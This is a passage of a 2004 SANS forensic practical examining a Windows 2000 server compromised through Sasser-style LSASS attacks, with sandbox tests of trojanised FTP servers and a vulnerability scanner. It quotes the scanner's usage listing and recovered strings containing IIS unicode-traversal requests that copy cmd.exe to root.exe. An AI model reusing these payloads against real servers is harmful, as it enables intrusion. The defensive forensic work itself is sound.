5,987 1		5,987	1	

The date and time on the "Security" settings on the same registry key matches the above values. This time corresponds with the time that the

"tsl.dll" file was created, and the "svchs.exe" was last written.

#### svchs.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. The svchs.exe.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from

'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

Checking 'filemon' revealed:

- svchs.exe first called tsl.dll, then executed:
  - o Tzolibr.dll
  - o Wsock32.dll
  - WS2\_32.DLL
  - WS2HELP.DLL
  - o Winmm.dll
  - o Mmdrv.dll
- It then looked for the following in the parent directory without success:
  - o svchs.ENG
  - o scvhs.ENG.DLL
  - o scvhs.EN
  - o scvhs.EN.DLL
- It then looked for the file BugSlayerUtil.dll in its own parent directory, C:\WINNT\system, C:\WINNT\system32 & C:\WINNT\system32\Wbem all without success.

This behaviour is almost identical to that of ServUDaemon.exe. However ServUDaemon.exe went on to execute a number of other files, which svchs.exe did not. The program did not appear to create a log file when run.

Checking 'regmon' revealed:

Svchs.exe queried nearly all audio drivers on the system (wave, midi, aux, mixer etc), as did ServUDaemon.exe, but again as above it did not go on to perform the additional tasks performed by ServUDaemon.exe.

The program was confirmed running by a Telnet to port 7777, which provoked the response:

220 SiGN - FR33-FXP3rs - On Da FUcKiNG C@Sú!!!

Interestingly, running the svchs.exe program started the ftp server. As with the ServUDaemon.exe program, it did not survive a reboot and had not been installed as a service as it appeared to have been on the compromised system. A similar test on a sandbox Windows XP SP1 system showed the same behaviour e.g. no ability to survive a reboot and the program not installed as a service. Therefore, as above, some other explanation will have to be found for the program found running as a service on the compromised system. It is also noted, that unlike ServUDaemon.exe, svchs.exe does not produce a log file.

# **Registry Analysis**

Encase Registry Analysis showed that the svchs service was created in the registry at 03:04 on 30 Apr, at the same time that the svchs.exe and associated files were created. This would suggest that the programs themselves registered the service, but that this behaviour was not replicated in testing.

This analysis also holds true for the Serv-U service, which was created at 09:09 on 8 May, the same time as the ServUDaemon.exe and .ini files.

# **Timeline Analysis**

There is a corresponding Sasser type attack (against the LSASS vulnerability) at 03:03 on 30 Apr with the creation of the \rpc directory and associated files.

# Recycler

We now turn our attention to the 'Recycler' as this was referenced on multiple occasions whilst investigating the other files. The root of the Recycler e.g. not in any users recycle bin contained the following:

Name	Logical Size	Physical Size	Hash Value	
a.exe	29,696	32,768	eec89cee57cb7c53c	7ac2423dc73a0a0
config.cfg	63	63	f0d71ae401d88b626f	578b4998793085
scan.txt	3,028	4,096	4cba99de9474ead01	3a1527685bc552f
Scanxxx.exe	88,576	90,112	f7025282b47e0ef3ea	a8f62b26c49e48c
Name	Last Accessed	File Created	Last Written	Entry Modified
a.exe	09/05/2004 16:37	09/05/2004 16:36	09/05/2004 16:37	16/05/2004 04:01
config.cfg	09/05/2004 16:38	09/05/2004 16:36	09/05/2004 16:38	16/05/2004 04:01
scan.txt	10/05/2004 11:18	09/05/2004 16:40	10/05/2004 11:18	16/05/2004 04:01
Scanxxx.exe	09/05/2004 16:40	09/05/2004 16:36	09/05/2004 16:36	16/05/2004 04:01
Name: File Ext:	a.exe			
File Type:	<ul> <li>exe</li> <li>Windows Exe</li> </ul>	outoblo		
File Category:	Code\Executa			
Signature:	Match	DIE		
Description:	File, Recycle	Rin Archive		
Last Accessed:	09/05/04 16:3			
File Created:	09/05/04 16:3			
Last Written:	09/05/04 16:3			
Entry Modified:	16/05/04 04:0			
Logical Size:	29,696			
Physical Size:	32,768			
Starting Extent:	0C-C1681545			
File Extents:	1			
Permissions:	•			
Physical Location:	6,887,640,576	3		

Evidence File: File Identifier: Hash Value: Full Path: File Extents Start Sector 13,452,423	2437 eec8	39cee57cb7c53c7ac2423d	c73a0a0 XXXX01\C\RECYCLER\a.exe <b>Clusters</b> 8	
Demaioniana				
Permissions Id: Property: Permissions:		S-1-1-0 Allow [FC] [M] [R&X] [R] [W] [S	Sync]	
Name: Id: Property:		Administrators S-1-5-32-544 Owner		
ld: Property:		S-1-5-18 Group		
Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path:	cfg Cont Wind File, 09/0 09/0 09/0 16/0 63 63 0C-C 1 • 25,0 Disk 2436 f0d7	Recycle Bin, Archive 5/04 16:38:19 5/04 16:36:26 5/04 16:38:19 5/04 04:01:37 C6106,280 43,736 from XXXX01 S1 1ae401d88b626f578b4998	793085 XXXX01\C\RECYCLER\config.c	fg
File Extents Start Sector	Sectors	Start Cluster	Clusters	
48,913	2	6,106		
Permissions Id: Property: Permissions: Name:		S-1-1-0 Allow [FC] [M] [R&X] [R] [W] [S Administrators	Sync]	
ld: Property:		S-1-5-32-544 Owner		
ld: Property:		S-1-5-18 Group		
The file contained the text:				
//Config Fi	le Generated	d by Modified Sfind 0.921		

Threads=3000

<b>Name:</b> File Ext: File Type:	<b>scan.txt</b> txt Text
File Category:	Document
Signature:	Match
Description:	File, Recycle Bin, Archive
Last Accessed:	10/05/04 11:18:53
File Created:	09/05/04 16:40:27
Last Written:	10/05/04 11:18:53
Entry Modified:	16/05/04 04:01:38

#### SANS GIAC Certified Forensic Analyst - Practical J Hayday 24 Oct 2004

Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path: File Extents	1 • 3,00 Disk 2443 4cba	5 2734179 7,229,440 from XXXX01 1 99de9474ead013a152768	85bc552f ) XXXX01\C\RECYCLER\s	can.txt
Start Sector	Sectors	Start Cluster	Clusters	
5,873,495	8	734,179	1	
Permissions Id: Property: Permissions: Name: Id: Property:		S-1-1-0 Allow [FC] [M] [R&X] [R] [W] [: Administrators S-1-5-32-544 Owner	Sync]	
ld: Property:		S-1-5-18 Group		

The file contained the text:

Scan Started at: 3000 Threads

COMMAND: Scanxxx.exe -p 5554 130.0.00 130.100.0.0 (Approx 600,000 addresses)

(A number of IP addresses (199) it had discovered listening on port 5554) e.g. infected with Sasser

Name: File Ext: File Type: File Category: Signature: Description: Last Accessed: File Created: Last Written: Entry Modified: Logical Size: Physical Size: Starting Extent: File Extents: Permissions: Physical Location: Evidence File: File Identifier: Hash Value: Full Path:	exe Wind Code Matc File, 09/05 09/05 16/05 88,57 90,17 0C-C 1 • 6,757 Disk 2436 f7025	Recycle Bin, Archive 5/04 16:40:27 5/04 16:36:27 5/04 16:36:32 5/04 04:01:38 76 12 51649856 7,842,432 from XXXX01		1 EB/Scanyyy eye
File Extents		Start Cluster	01	
Start Sector 13,198,911	Sectors 176	1,649,856	Clusters 22	
Permissions Id: Property: Permissions:		S-1-1-0 Allow [FC] [M] [R&X] [R] [W]	[Sync]	
Name: ld: Property:		Administrators S-1-5-32-544 Owner		
ld: Property:		S-1-5-18 Group		

#### Scanxxx.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. The Scanxxx.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from

'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

First the file Scannxxx.exe was placed in a new directory C:\test on its own, and the command Scanxxx.exe /? was run from a command prompt:

config file not found using default threads (500)

Usage: scanxxx <Option> <Parameter>

<option>:</option>		
-config	Threads	Set scan speed
-р	<port port-port> <ip ip-ip></ip ip-ip></port port-port>	Scan port
-cgi	<ip address=""></ip>	Scan cgi hole
-idq	<start ip=""> <end ip=""></end></start>	Scan .idq hole
-pri	<start ip=""> <end ip=""></end></start>	Scan .printer hole
-apache	<start ip=""> <end ip=""></end></start>	Scan Apache 1.3.x
-apache2	<start ip=""> <end ip=""></end></start>	Scan Apache 2.x
-apachechunked	<start ip=""> <end ip=""></end></start>	Scan Apache Win32 Chunked
-uni	<start ip=""> <end ip=""></end></start>	Scan unicode hole
-webdav	<start ip=""> <end ip=""></end></start>	Scan Webdav hole
-real	<start ip=""> <end ip=""></end></start>	Scan RealMedia 8.x/9.x
-mdac	<start ip=""> <end ip=""></end></start>	Scan .mdac hole
-media	<start ip=""> <end ip=""></end></start>	Scan IIS Media Services
-codered	<pre><start ip=""> <end ip=""></end></start></pre>	Scan codered virus host
-ftp	<start ip=""> <end ip=""></end></start>	[-admin]
-um	<ip addr=""> [Web path] <message< td=""><td>&gt; Modify web files</td></message<></ip>	> Modify web files

Example: scanxxx -webdav 192.168.0.1 192.168.0.255

-Credits DOH?

Nothing unusual was reported by 'regmon' or 'filemon' except that a scan.txt file was created, in the C:\test directory, containing the following:

Scan Started at: 500 Threads
COMMAND: scanxxx /?
Scan Complete!

Scanxxx.exe appears to be a lightweight command line scanner configurable

to look for specific vulnerabilities or ports.e.g.

Further testing revealed that the scanner functioned correctly and always produced a scan.txt file at the end of the scanning run. Scanxxx.exe does not rely on a.exe to function, and does not call it in operation.

On searching unallocated file space, the following segment of Scanxxx.exe code was found, which shows details of some of the exploits being run:

02339483313 | -Credits DOH? ..... Example: ..... -webdav 192.168.0.1 192.168.0.255 ...... -um media 02339483643 | Scan IIS Media Services ...... -mdac Scan .mdac hole ........... -real Scan listening······ioctIsocket error·······% Complete. ····Socke 02339484633 | t() Error····· Modify fail.····· Modify complete! ..... recv error ..... connect error ... Not found root exe. ..... Cantnot find the path '.....'. .. Modify def 02339484798 | ault.asp......done.·····Modify default.htm.....done.·····Modify index.asp......done........Modify index.htm......done.........02339484963 | .404 Access is denied......cannot find the path.......^+>....GET /scripts/root.exe?/c+echo+^^.... 02339485128 | cmd.exe to root.exe.....done......GET /scripts/ 02339485293 | ..%255c%255c../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cmd.exe+root.exe ------1 file(s) copied.....recv2 error....send error.....GET /s 02339485458 | cripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+root.exe .....socket error FOUND RealServer Version 9.\* Win32.... 02339485623 | ..... FOUND RealServer Version 9.\* Linux ........ RealServer Version 9....... FOUND RealServer Version 8.\* Win32 ....... vin32 ... FOUND RealServer Version 8.\* Linux 02339485788 | ...... linux RealServer Version 8.....-Apache2...-Apache..... FOUND Apache 1.3.24 Win32!.....Apache/1.3.24 (Win32)...... FOUND Apache 1.3.23 Win32!····· 02339485953 | ···Apache/1.3.23 (Win32)······ FOUND Apache 1.3.22 Win32!····· Apache/1.3.22 (Win32)······ FOUND 02339486118 | Apache 1.3.19 Win32!.....Apache/1.3.19 (Win32)..... FOUND Apache 1.3.17 Win32!------Apache/1.3.17 (Win32)----- FOUND Apache 1.3.14 Win32!------Apache/ 02339486283 | 1.3.14 (Win32) ------ Apachechunked ----- 200 OK --- GET ---- ======Version 0.921 By MaXxX =======············ =========Modded Sfind=== 02339486448 | ======·········Please wait ···· Thread end..... find codered host ..... GET /scripts/root.exe?/c+dir ..... find unicode hole ..... GET /scripts/..%255c% 02339486613 | 255c../winnt/system32/cmd.exe?/c+dir ..... Host Running Apache 2.x······Apache/2.··· Host Running Apache 1.3.x·····CONNECT 1.3.3.7:1337 HTTP/1.0 ····· 02339486778 | · Windows Media Services Enabled ......GET /scripts/nsiislog.dll .....RealServer .....OPTIONS / RTSP/1.0 02339487108 | ole ·····GET /NULL.idq ······ ftp user anonymous longin succeed. ······· password is you Email..... ftp user administrator longin succeed. password is '..... 02339487273 | ...'.. ftp user administrator longin succeed. no password.....Socket() Error.....QUIT ..230.331.Send() Error 220 pass ... pass sunw@www.com .... user a 02339487438 | nonymous ... user administrator ......GetConsoleScreenBufferInfo Error......Scan Completel.....Password : ....Send()2 Error...Send()1 Error ... + OK .... use 02339487603 | r ... Test

#### A.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. The a.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from 'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been

previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

The file a.exe was placed in a directory C:\test and run from the command line with the following results:

- When run with no parameters, the program returned: "The command to execute must be passed as a Command Line Parameter".
- When run with a range of parameters, the program returned: "Execution of the specified command has failed".
- When run the a.exe called:
  - INDICDLL.dll
  - o IMM32.dll
- A.exe queried the following registry values:
  - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LeakTrack
  - HKLM\System\CurrentControlSet\Control\Session Manager\SafeDIISearchMode
  - HKLM\System\CurrentControlSet\Control\Session Manager\AdditionalBaseNamedObjectsProtectionMode
  - HKLM\SOFTWARE\Microsoft\OLE\PageAllocatorSystemHeap
  - HKLM\SOFTWARE\Microsoft\OLE\PageAllocatorSystemHeapls Private
  - HKLM\System\CurrentControlSet\Control\Session Manager\CriticalSectionTimeout
- No files were written or registry values altered.

Examination of the file itself revealed:

- It was a Windows32 executable
- When running correctly it seemed to rely on kernel32.dll functions

Running the program through Microsoft Visual Studio debugger revealed the following (although the program contained no debugging information):

'a.exe': Loaded 'C:\WINDOWS\system32\ntdll.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\kernel32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\user32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\gdi32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\oleaut32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\msvcrt.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\advapi32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\rpcrt4.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\ole32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\uxtheme.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\PGPhk.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\nview.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\shlwapi.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\shell32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\psapi.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\comctl32.dll', No symbols loaded. 'a.exe': Loaded 'C:\WINDOWS\system32\winnm.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\version.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\WinSxS\x86\_Microsoft.Windows.Common-Controls\_6595b64144ccf1df\_6.0.2600.2180\_x-ww\_a84f1f9\comctl32.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\ntmarta.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\widap32.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\widap32.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\samlib.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\nxwing.dll', No symbols loaded.
'a.exe': Loaded 'C:\WINDOWS\system32\nvwing.dll'
'a.exe': Loaded 'C:\WINDOWS\system32\nvwing.dll'
'a.exe': Loaded 'C:\WINDOWS\system32\nvwidd.dll', No symbols loaded.

#### svchost.exe 'Sandbox'

A Windows 2000 Server with Service Pack 4 was created within a VMW are session and a snapshot of the system was taken using Winalysis. The svchost.exe program was then run, whilst the file system and registry were being monitored by 'filemon' and 'regmon' from

'http://www.sysinternals.com'. These files were run from a Windows Forensic CDROM which had been previously created with a number of tools and was collectively MD5'd as C7131AAE5690BF3E6C69B8D6BAAAD04.

The file svchost.exe was placed in a directory C:\test and run from the command line with the following results:

- Two new files were created in the c:\test directory:
  - tcp\_setting.ocx
     [GLOBAL]
     Version=5.0.0.0
     ProcessID=924
  - winstaterrorlog.dll

Sun 24Oct04 09:23:59 - tcp-ip FTP Server v5.0 (5.0.0.0) - Copyright (c) 1995-2004 Cat Soft, All Rights Reserved - by Rob Beckers

Sun 24Oct04 09:23:59 - Cat Soft is an affiliate of Rhino Software, Inc.

Sun 24Oct04 09:23:59 - ServUDaemon.ini setup file not found, creating new one

Sun 24Oct04 09:23:59 - Using WinSock 2.0 - max. 32767 sockets

Sun 24Oct04 09:24:00 - PROBLEM: Unable to load the SSL/TLS libraries (SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support

Sun 24Oct04 09:24:00 - FTP Server listening on port number 43958, IP 127.0.0.1

Sun 24Oct04 09:24:00 - You are in the trial period: 30 days of "Professional Edition" try-out left

Checking 'filemon' revealed:

- svchost.exe first executed:
  - Wsock32.dll
  - WS2\_32.DLL
  - WS2HELP.DLL
  - o Winmm.dll
  - o Mmdrv.dll
- It then looked for the following in the parent directory without success:

- ServUDaemon.ENG
- ServUDaemon.ENG.DLL
- ServUDaemon.EN
- o ServUDaemon.EN.DLL
- It then looked for the file BugSlayerUtil.dll in its own parent directory, C:\WINNT\system, C:\WINNT\system32 & C:\WINNT\system32\Wbem all without success.
- Then the program executed:
  - C:\WINNT\system32\INDICDLL.dll
  - C:\WINNT\system32\IMM32.dll
- Next, not finding winstaterrorlog.dll, it created a new file of that name.
- It then looked for tcp\_setting.ocx in the following locations:
  - C:\WINNT\system32\tcp\_setting.ocx
  - C:\WINNT\system\tcp\_setting.ocx
  - C:\WINNT\tcp\_setting.ocx
  - C:\WINNT\system32\Wbem\tcp\_setting.ocx
- Failing to find the file, it created a new file of that name.
- It then looked for a file C:\test\tcp-ipID.txt, which it could not find.
- After reading tcp\_setting.ocx, it executed:
  - C:\WINNT\system32\msafd.dll &
  - C:\WINNT\system32\wshtcpip.dll
- After reading C:\WINNT\win.ini, it set some information in C:\WINNT\system32\config\software.LOG
- It then looked for libeay32.DLL in the following locations without sucess:
  - C:\WINNT\system32\libeay32.DLL
  - C:\WINNT\system\libeay32.DLL
  - o C:\WINNT\libeay32.DLL
  - O C:\WINNT\system32\Wbem\libeay32.DLL
- After again reading winstaterrorlog.DLL, it executed:
  - C:\WINNT\system32\rnr20.dll &
  - o C:\WINNT\system32\DNSAPI.dll
  - C:\WINNT\system32\iphlpapi.dll
  - C:\WINNT\system32\ICMP.dll

- C:\WINNT\system32\MPRAPI.dll
- C:\WINNT\system32\SAMLIB.dll
- C:\WINNT\system32\NETAPI32.dll
- C:\WINNT\system32\SECUT32.dll
- C:\WINNT\system32\NETRAP.dll
- C:\WINNT\system32\ACTIVEDS.dll
- C:\WINNT\system32\ADSLDPC.dll
- C:\WINNT\system32\RTUTILS.dll
- C:\WINNT\system32\SEPUPAPI.dll
- C:\WINNT\system32\USERENV.dll
- C:\WINNT\system32\RASAPI32.dll
- C:\WINNT\system32\RASMAN.dll
- C:\WINNT\system32\TAPI32.dll
- C:\WINNT\system32\DHCPCSVC.dll
- o C:\WINNT\system32\winrnr.dll
- C:\WINNT\system32\rasadhlp.dll

Checking 'regmon' revealed:

- Svchost.exe queried nearly all audio drivers on the system (wave, midi, aux, mixer etc)
- It then obtained the systems Winsock2 and TCP parameters
- It obtained the Setup path details
- It then obtained multiple Cryptographic RNG Seed values

The behaviour of this program is almost identical to that of ServUDaemon.exe, whereas, svchs.exe appears to only perform a subset of the actions of these programs.

# Windows Event Logs

# Security Log

The Security Log was cleared on 2 Aug 2002

# Application Log

The Application Log covered the period 21:48 6 May 2004– 15:41 21 May 2004, and contained the following of interest:

• 6 May 21:49 - 8 May 11:45

Multiple (thousands) events showing an error (1008) reported by Perflib in rasctrs.dll and corresponding multiple errors (2001) from rasctrs. These events reoccur multiple times per minutes and fill most of the log.

• 9 May 16:17

Norton AntiVirus reported completing a scan of 42197 files on the system and finding no infected files.

# System Log

The System Log covered the period 14:17 2 Aug 2002 – 15:13 21 May 2004, and contained the following of interest:

- There are no entries at all between 13:12 28 Apr and 20:52 6 May. The server started at 13:12 28 Apr and shutdown at 20:52 6 May.
- 6 May 20:57 The system rebooted after a clean shutdown
- 6 May 21:03 The system rebooted after a dirty shutdown
- 6 May 21:10 The system rebooted after a dirty shutdown
- 6 May 23:09 The system generated an error "Idle timer expired; Session has been idle over its time limit. Logoff will start in 2 minutes. Press any key now to continue session." This message indicates that the current user had a terminal server session open.
- 7 May 08:18 The system rebooted after a clean shutdown
- 7 May 08:51 The system rebooted after a dirty shutdown
- 7 May 08:56 The system rebooted after a dirty shutdown
- 7 May 09:04 The system rebooted after a dirty shutdown
- 7 May 09:13 The system rebooted after a dirty shutdown
- 7 May 09:28 The system rebooted after a dirty shutdown
- 7 May 10:20 The system rebooted after a dirty shutdown
- 7 May 10:55 The system rebooted after a dirty shutdown
- 7 May 11:16 The system rebooted after a dirty shutdown
- 7 May 11:50 The system rebooted after a dirty shutdown
- 7 May 12:04 The system rebooted after a dirty shutdown
- 7 May 12:11 The system rebooted after a dirty shutdown
- 7 May 12:23 The system rebooted after a dirty shutdown
- 7 May 12:51 The system rebooted after a dirty shutdown
- 7 May 13:20 The system rebooted after a dirty shutdown
- 8 May 09:09 10:03 System generated multiple event 7024s from the Service Control Manager reporting a "Serv-U FTP Server; 100"
- 8 May 10:03 The system rebooted after a clean shutdown. One service failed to restart.
- 8 May 10:03 10:58 System again generated multiple event 7024s

from the Service Control Manager reporting a "Serv-U FTP Server; 100." These messages were intermixed with multiple event 50 from TermDD, with the error /Device/Termdd; "DATA ENCRYPTION".

- 8 May 11:39 11:45 System produced multiple event 7001s from the Service Control Manager, with the error "Remote Access Connection Manager; Telephony; %%1058;" (Translated to "The Remote Connection Manager service depends on the Telephony service which failed to start because of the following error: The service cannot be started either because it is disabled or because it has no enabled devices associated with it).
- 8 May 11:54 The system rebooted after a clean shutdown
- 10 May 12:04 11 May 19:02 System produced ten event 50s from TermDD, with the error /Device/Termdd; "DATA ENCRYPTION".
- 12 May 19:39 System rebooted after a clean shutdown
- 13 May 10:13 System rebooted after a clean shutdown
- 20 May 19:10 System rebooted after a dirty shutdown

# **Deleted File Analysis**

Except as indicated above, where parts of files were found in unallocated space, no useful information was obtained from the examination of complete deleted files (other than those files discovered in the "Recycler".

# Conclusions

The following conclusions are made from the forensic examination of this disk:

# **Overall Analysis**

Between the period 27 Apr and 8 May 2004, the Windows 2000 Server XXX01 can under sustained attack against the LSASS vulnerability reported by Microsoft as MS 04-11. Whilst all of the attacks appeared to use the same or similar techniques, some could be attributed to know versions of the "Sasser" Worm, others were either modifications of the worm or more manual attacks by more than one hacker. A number of the attacks appear to have been unsuccessful in compromising the system, although the exploit appeared to have functioned correctly. No trace of known versions of the "Sasser" worm was found on the system, although on 5 May the first part of an attack was successful in the uploading of the file "cmd.ftp", which then tried to upload additional files. It failed in doing so.

Three different trojanised versions of Serv-U FTP Server were discovered on the system (installed on 30 Apr and 7 & 8 May). As these all tried to use port 43958, they conflicted with each other, and it is therefore assumed that they were installed by three different worms/hackers. Two of the trojanised servers installed themselves as services, the third did not. On 8 May, a hacker prevented further attacks against the server by setting the "RestrictAnonymous" key in the registry to prevent anonymous access. On 9 May a lightweight command line scanner was installed on the system and used to scan 600,000 IP Addresses for the presence of an open port 5554 (indicating a "Sasser" compromise). It completed its scan on 10 May and recorded 199 compromised systems.

Analysis of all the programs discovered on the system is contained in the body of the report.

The system was not reported compromised until 21 May 04.

# Timeline

# 27 Apr 17:17

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 28 Apr 19:54

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 30 Apr 03:03

- dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability
- The files "svchs.exe", "tsl.dll (03:04)" & "tzolibr.dll" were created in the "C:\WINNT\system32\spool\prtprocs\rpc\" directory. The file "svchs.exe" was registered as the service "System Log".

# 1 May 23.53

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 2 May 19:20

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 2 May 19:36

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 3 May 05:43

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 5 May 13:53

- The file "cmd.ftp" was created in the "C:\WINNT\system32\" directory.
- The file "cmd.ftp" attempted to download two files "12552.exe" & "5906.exe". No trace of the second file is present on the system, but a zero length file "12552.exe" was created in the "C:\WINNT\system32\" directory at 13:53.

# 5 May 13:56

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 6 May 20:58

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 6 May 21:03

o The system rebooted following a dirty shutdown

# 6 May 21:10

• The system rebooted following a dirty shutdown

# 6 May 23:09

 The system generated an error "Idle timer expired; Session has been idle over its time limit. Logoff will start in 2 minutes. Press any key now to continue session." This message indicates that the current user had a terminal server session open.

# 7 May 08:51

- dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability
- The system rebooted following a dirty shutdown

# 7 May 08:56

• The system rebooted following a dirty shutdown

# 7 May 09:04

o The system rebooted following a dirty shutdown

# 7 May 09:13

o The system rebooted following a dirty shutdown

# 7 May 09:23

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 09:28

• The system rebooted following a dirty shutdown

# 7 May 10:15

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 10:20

o The system rebooted following a dirty shutdown

# 7 May 10:50

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 10:55

o The system rebooted following a dirty shutdown

# 7 May 11:11

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 11:16

o The system rebooted following a dirty shutdown

# 7 May 11:45

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 11:50

o The system rebooted following a dirty shutdown

# 7 May 11:55

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 12:04

• The system rebooted following a dirty shutdown

# 7 May 12:06

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 12:11

• The system rebooted following a dirty shutdown

# 7 May 12:18

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 12:23

• The system rebooted following a dirty shutdown

# 7 May 12:46

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 12:51

• The system rebooted following a dirty shutdown

# 7 May 13:15

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 13:20

• The system rebooted following a dirty shutdown

#### 7 May 15:38

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 7 May 17:45

- dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability
- Files "svchost.exe" and "tcp\_setting.ocx" were created in the "C:\WINNT\system\" directory. Although "tcp\_setting.ocx" will be created by "svchost.exe when run, if not already present, this version has a timestamp that indicates it was created before the executable was run, and it also contains more information than would be present if created at runtime.

# 7 May 18:03

 File "winstaterrorlog.dll was created in the "C:\WINNT\system\" directory. This file is created when the "svchost.exe" executable is run, indicating that "svchost.exe" first ran at this time.

#### 8 May 04:27

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

#### 8 May 09:06

 dcpromo.log shows evidence of large string input consistent with Sasser type attack against LSASS vulnerability

# 8 May 09:07

 File "wx1.exe" was created on the system in "C:\WINNT\system32\temped\". This is the file dropper for "ServUDaemon.exe" and "ServUDaemon.ini". The file "ServUDaemon.exe" was registered as the service "Serv-U FTP Server".

# 8 May 09:08

 The file "secsas.exe" was run and modified the "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous" registry key to prevent further anonymous connections to the system. This appeared to work as there are no further "Sasser" type exploits against the LSASS vulnerability reported after this time.

# 8 May 09:09

- The file "wx1.exe" was run to extract the "ServUDaemon.exe" and "ServuDaemon.ini" files into the "C:\WINNT\system32\temped\" directory.
- System generated multiple event 7024s from the Service Control Manager reporting a "Serv-U FTP Server; 100"

# 8 May 10:03

 "ServUStartUpLog.txt" reported FTP Server (ServUDaemon.exe) started, listening on ports 261 (on 10.6.4.119, 10.6.3.19 & localhost) and 43958 (localhost only).

# 8 May 10:03 - 10:58

 System again generated multiple event 7024s from the Service Control Manager reporting a "Serv-U FTP Server; 100." These messages were intermixed with multiple event 50 from TermDD, with the error /Device/Termdd; "DATA ENCRYPTION".

# 8 May 10:20

"ServStartUpLog.txt" reported that the FTP Server (ServUDaemon.exe)
 "was going down".

# 8 May 11:39 - 11:45

 System produced multiple event 7001s from the Service Control Manager, with the error "Remote Access Connection Manager; Telephony; %%1058;" (Translated to "The Remote Connection Manager service depends on the Telephony service which failed to start because of the following error: The service cannot be started either because it is disabled or because it has no enabled devices associated with it).

# 9 May 16:36

• The files "a.exe", config.cfg" & "Scannxxx.exe" were created in the "Recycler".

# 9 May 16:40

The file "scan.txt" was created in the "Recycler". Tests indicate that this indicates that the "Scanxxx.exe" program was run at this time. The scan was configured to scan 600,000 IP addresses looking for open port 5554 (indicating a "Sasser" infection).

# 10 May 11:18

• The file "scan.txt" was last written to. The file indicates that the scan discovered 199 system infected with "Sasser".

# 10 May 12:04 - 11 May 19:02

 System produced ten event 50s from TermDD, with the error /Device/Termdd; "DATA ENCRYPTION".

# 13 May 10:14

